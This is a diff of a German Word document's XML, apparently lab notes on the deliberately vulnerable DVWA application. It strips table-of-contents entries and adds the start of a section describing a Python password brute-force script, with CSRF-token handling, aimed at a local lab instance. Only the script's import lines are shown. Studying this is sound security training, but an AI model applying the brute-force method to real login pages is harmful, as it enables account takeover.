--- a/Security dvwa doku/Cebrail dvwa doku.docx
+++ b/Security dvwa doku/Cebrail dvwa doku.docx
@@ -114,7 +114,11 @@
           <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
         </w:tabs>
         <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="de-DE"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -127,7 +131,7 @@
       <w:r>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
-      <w:hyperlink w:anchor="_Toc159223568" w:history="1">
+      <w:hyperlink w:anchor="_Toc189212989" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -155,7 +159,7 @@
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223568 \h </w:instrText>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc189212989 \h </w:instrText>
         </w:r>
         <w:r>
           <w:rPr>
@@ -187,1038 +191,6 @@
       </w:hyperlink>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223569" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>Command Injection</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223569 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223570" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>C SRF</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223570 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223571" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>File Inclusion</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223571 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223572" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>File Upload</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223572 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223573" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>Insecure CAPTCHA</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223573 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223574" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>SQL Injection</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223574 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223575" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>SQL Injection (Blind)</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223575 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223576" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>Weak Session IDs</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223576 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223577" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>XSS (DOM)</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223577 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223578" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>XSS (Reflected)</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223578 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223579" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>XSS (Stored)</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223579 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223580" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>CSP Bypass</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223580 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223581" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>Javascript</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223581 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223582" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>Authorisation Bypass</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223582 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Verzeichnis1"/>
-        <w:tabs>
-          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-        </w:tabs>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc159223583" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>Open HTTP Redirect</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc159223583 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
       <w:r>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
@@ -1233,7 +205,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc159223568"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc189212989"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3390,6 +2362,1299 @@
       </w:r>
     </w:p>
     <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Brute-Force-Angriff-Beispiel</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dieser Code führt einen Brute-Force-Angriff auf die Login-Seite der </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Fett"/>
+        </w:rPr>
+        <w:t>Damn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Fett"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Vulnerable Web </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Fett"/>
+        </w:rPr>
+        <w:t>Application</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Fett"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (DVWA)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> durch. Mithilfe der </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>requests</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">-Bibliothek werden Passwörter aus einer Liste systematisch ausprobiert, bis das korrekte Passwort gefunden wird. Dabei wird auch ein CSRF-Token berücksichtigt, falls die DVWA-Seite eines erfordert, um die Authentifizierung erfolgreich zu simulieren. Der Angriff richtet sich auf die lokale DVWA-Instanz unter </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>http://10.115.1.6:4280</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>import requests</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">from bs4 import </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BeautifulSoup</w:t>
